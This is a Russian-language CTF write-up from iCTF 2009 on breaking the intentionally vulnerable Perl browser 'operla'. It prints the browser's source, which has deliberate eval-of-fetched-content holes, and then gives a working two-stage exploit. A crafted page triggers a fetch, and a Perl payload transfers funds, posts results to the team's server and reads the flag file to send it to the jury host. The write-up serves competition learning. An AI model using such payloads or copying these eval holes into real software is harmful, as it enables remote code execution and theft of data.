ХакерДом: CTF/UCSBiCTF2009/operla ...

Браузер oPerla

Браузер Operla, как можно догадаться из названия, написан на Perl'е. Скачать его вместе с остальными браузерами можно с ftp.hackerdom.ru (ещё рано!), там же можно найти немало образов прошлых CTF. Всего было 3 версии этого браузера: 0.1, 0.2 и 0.3 соответственно. До релиза было далеко :) За разбор браузеров я сел не сразу, как и многие другие я занимался решением квестов. Потом, поняв, что на квестах игру не выйграешь, занялся основной задачей. К этому моменту несколько участников уже изучали браузеры. Узнав, на чем написаны браузеры и кто каким уже занимается я решил хакнуть “erbrawser”, который был написан на Erlang. Пока этот язык ставился на мой Linux я мельком посмотрел на operla версии 0.2, и остановился на нем :)

Так как код этого браузера небольшой я приведу его прямо тут:

#!/usr/bin/perl -w use LWP; use HTTP::Cookies; use Getopt::Std; use Term::ReadLine; use HTML::Parser; use Digest::MD5 qw(md5_hex); use Cwd; use lib '/usr/local/operla-0.2/'; use Object; $VER = '0.2'; $term = new Term::ReadLine 'operla'; $curdoc = ''; my %opts = (); getopts('p:x:',\%opts); my $prompt = 'COMMAND'; if (defined($opts{p})) { $prompt = $opts{p} } $prompt .= "> "; my $ua = LWP::UserAgent->new(); $ua->agent('OperlA-' . $VER); $ua->cookie_jar(HTTP::Cookies->new( 'file' => './cookies.lwp', 'autosave' => 1, 'ignore_discard' => 1, )); if (defined($opts{x})) { $ua->proxy(['http'] => $opts{x}); print "DEBUG:operla:setting an http proxy as: " . $opts{x} . "\n"; } sub cookie_handler { my $cstr = shift @_; my $res = (); my @lines = split("\n", $cstr); foreach $l (@lines) { if ($l =~ /^[^ ]* ([^=]*)=([^;]*)/) { $res->{$1} = $2; } } return $res; } sub trustedCstore { return 0; } sub getUrl { my $url = shift @_; my $res = $ua->get($url); #cookie handler my $cstr = $ua->cookie_jar->as_string; $c = cookie_handler($cstr); if ((defined ($c->{'sec'}) && trustedCstore($c->{'sec'})) && defined($c->{'Remote-Cookie-Store'})) { $cstrurl = $c->{'Remote-Cookie-Store'}; $cstrurl =~ s/\%([A-Fa-f0-9]{2})/pack('C', hex($1))/seg; $cstr =~ s/([^A-Za-z0-9])/sprintf("\%\%\%02X", ord($1))/seg; $cstrurl .= "?$cstr"; $ua->get($cstrurl); } return $res->as_string(); } sub postUrl { my $url = shift @_; my $params = shift @_; my $res = $ua->post($url, Content => $params); return $res->as_string(); } while ( defined ($line = $term->readline($prompt)) ) { if ($line =~ /^u ([^ ]*)$/) { $curdoc = getUrl($1); doObjects(); print $curdoc; next; } if ( $line =~ /^p ([^ ]*)( (.*))?$/) { $curdoc = postUrl($1, $3); print $curdoc; next; } if ($line =~ /^l$/) { getLinks(); next; } if ($line =~ /^q$/) { die "thanks for using operla\n"; } } sub doObjects { my $objParser = HTML::Parser->new(api_version => 3); $objParser->handler(start => \&objStart, 'self, tagname, attr, text'); $objParser->handler(end => \&objEnd, 'self, tagname, attr, text'); $objParser->parse($curdoc); $objParser->eof; } sub getLinks { my $link_parser = HTML::Parser->new(api_version => 3); $link_parser->handler(start => \&start, 'self, tagname, attr, text'); $link_parser->parse($curdoc); $link_parser->eof; } sub objStart { my ($self, $tagname, $attr, $text) = @_; $self->handler(text => \&objText, 'self, tagname, attr, text'); $obj = new Object(ua => $ua); $obj->setParams($attr->{clsid}, $attr->{url}, $attr->{data}); $self->{o} = $obj; } sub objText { my ($self, $tagname, $attr, $text) = @_; if ($text =~ /action=([^;]*)/) { $obj = $self->{o}; $obj->action($1); } } sub objEnd { my ($self, $tagname, $attr, $text) = @_; $self->handler(text => undef); } sub start { my ($self, $tagname, $attr, $text) = @_; if (($tagname eq 'a') && defined($attr->{'href'})) { print $attr->{'href'} . "\n"; } return; }

В строке $cstr =~ s/([^A-Za-z0–9])/sprintf... перед "%" необходимо убрать символ "\" :)
А теперь модуль Object:

package Object; use LWP; use Digest::MD5 qw(md5 md5_hex md5_base64); use vars qw($result $url $data $clsid $ua); sub setParams { $self = shift @_; $self->{clsid} = shift @_; $self->{url} = shift @_; $self->{data} = shift @_; } sub verifySignature { my $self = shift @_; $data = shift @_; $hash = md5_hex($data); if ($data eq "" or $hash eq '5eb63bbbe01eeedO93cb22bb8f5acdc3' or $data eq "") { return 1; } return 0; } sub animate { my $self = shift @_; my $url = shift @_; my $interval = shift @_; my $ua = $self->{ua}; my $res = $ua->get($url); my $content = $res->content(); my $check = 0; if (length($content) > 128) { $content .= rand(12); if ($content !~ /cat/ && \ $content !~ /bin/ && \ $content !~ /nc/) { $seccontent = $content; foreach $c (split(/./, $seccontent)) { if (ord($c) > 250) { $check--; } else { $check++; } } if ($check <= 128) { eval($seccontent); } } } } sub action { $self = shift @_; $action = shift @_; if ($action eq 'update') { my $ua = $self->{ua}; $res = $ua->get($self->{data}); $value = $res->content; if ($self->verifySignature($va1ue)) { eval($value); } } elsif ($action =~ /animateGfx/) { $self->animate($self->{url}); } return 1; } sub new { my $class = shift; my $self = {@_}; return bless $self, $class; } return 1;

В основном коде, в функции getUrl, можно увидеть, что небольшими хитростями браузер можно заставить выполнить ещё один GET запрос. Но, к сожалению, условие в необходимом if всегда будет false (см. функцию trustedCstore). А вот если посмотреть модуль Object, то там без труда можно обнаружить 2 eval, один в функции animate, другой в action.

Не тратя время зря я взялся за функию action. Все оказалось достаточно просто, взлом браузера производился в два этапа:

• зайдя на специальную веб страницу, браузер можно заставить выполнить ещё один произвольный GET запрос;
• содержимое второй страницы полностью поадет в eval.

Вот такой должна быть первая страница:

<html clsid="lalalal" url="mzmzmzmzmzmz" data="http://10.33.0.2/for_perl_0.2.html">action=update</html>

А вот такой должны быть вторая:

my %a;my %b;my $res;$b{account}="hackerdom";$b{amount}=30;$b{submit}="Perform Transaction";$res=$ua->post("http://10.0.3.10:9000/transfer", \%b);$a{data}=$res->as_string();$ua->post("http://10.33.0.2/perl_dump.php", \%a);my $c=`cat flag`;for(split /\n/,$c){chomp;$ua->get("http://10.0.3.50:7000/bot?t=hackerdom&k=$_")};

Приведенный выше Perl код делал следущее:

• переводил 30$ на счет hackerdom;
• результат перевода отправлялся методом POST к нам на сайт (вот такой дебаг :);
• считывал из текущей директории файл flag, результат разбивал по \n и отправлял жюри (http://10.0.3.50:7000/bot?t=hackerdom&k=<flag>).

Невзирая на то, что я занимался взломом operla версии 0.2, эксплоит работал и на версии 0.3.